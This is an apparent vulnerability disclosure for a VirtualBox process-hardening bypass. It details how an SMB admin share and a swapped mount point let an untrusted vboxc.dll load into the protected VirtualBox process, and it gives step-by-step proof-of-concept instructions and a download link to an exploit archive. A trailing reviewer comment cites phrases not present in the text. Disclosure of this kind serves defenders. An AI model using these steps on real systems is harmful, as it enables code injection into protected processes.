This is easy enough using a remote server but it would be more useful to exploit locally. For that we can use the default admin shares on a Windows system which expose the drives over SMB. Even though their primary purpose is for administration you don't need to be an administrator if you access them locally, you'll just get access just a the same user account. So we can do the redirection of the file access as follows:
1. Set up a path such as c:\poc somewhere on an NTFS drive and copy the untrusted DLL to that directory called vboxc.dll.
2. Create a mount point (a directory symlink) at c:\poc\dummy which redirects to c:\poc.
3. Map \\localhost\c$\poc\dummy\vboxc.dll. The SMB server will follow the mount point and open c:\poc\vboxc.dll, however from the client perspective (even though we're on the same machine) the file still thinks the original UNC path.
4. Change the mount point to c:\program files\oracle\virtualbox. Now when accessing the UNC path the file opened will be the real vboxc.dll file which is signed and has a trusted owner.
The main reason this works is the fact that from a client perspective the filename never changes therefore the hardening code can't do much about it. The only way to tell the mapped file doesn't match the original would be to check the acual mapped image data as requesting its path using the memory manager would just return the UNC path. Ultimately I guess you probably shouldn't be trusting code on UNC paths.
Proof of Concept:
Ive provided a PoC which will abuse the VBox COM Client loading process in source form.
Prerequisites:
Compile the supplied project in release mode using VS2015. I've only provided x64 version, it should work on x86 but I've not got anything to test it on. Then follow these steps:
1) Create the directory c:\poc and copy RunPoc.exe, NtApiDotNet.dll and the fake vboxc.dll to that directory.
2) Execute RunPoc.exe, it should print that it's successfully loaded the file. At this point DO NOT close the RunPoc executable as the file needs to stay mapped.
3) Start a VM. Each process the DLL is injected into will show a message box. This will include the protected VirtualBox.exe process.
4) When done testing hit enter in the RunPoc executable to ensure the keys get deleted.
Expected Result:
Untrusted DLL loading should fail inside a protected process.
Observed Result:
DLL is loaded into the protected process.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42426.zip
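Review bot: typos in the added text: "acual" (for "actual"), "has a owner set appropriately" ("an owner"), and "just a the same user account" (drop the stray "a"). "S0867394" is an external tracker id with no link; the earlier report appears to be the companion 42425.txt in this same commit, and a pointer to it would help readers. The step "DO NOT close the RunPoc executable as the file needs to stay mapped" is the crux of the technique: the hardening code validates the file by its UNC path while the kernel reuses the already-mapped image section, so the author's own conclusion, that the hardening layer should not trust code on UNC paths, is the mitigation to take away. The "x64 only" note means the x86 path is untested, not known-safe.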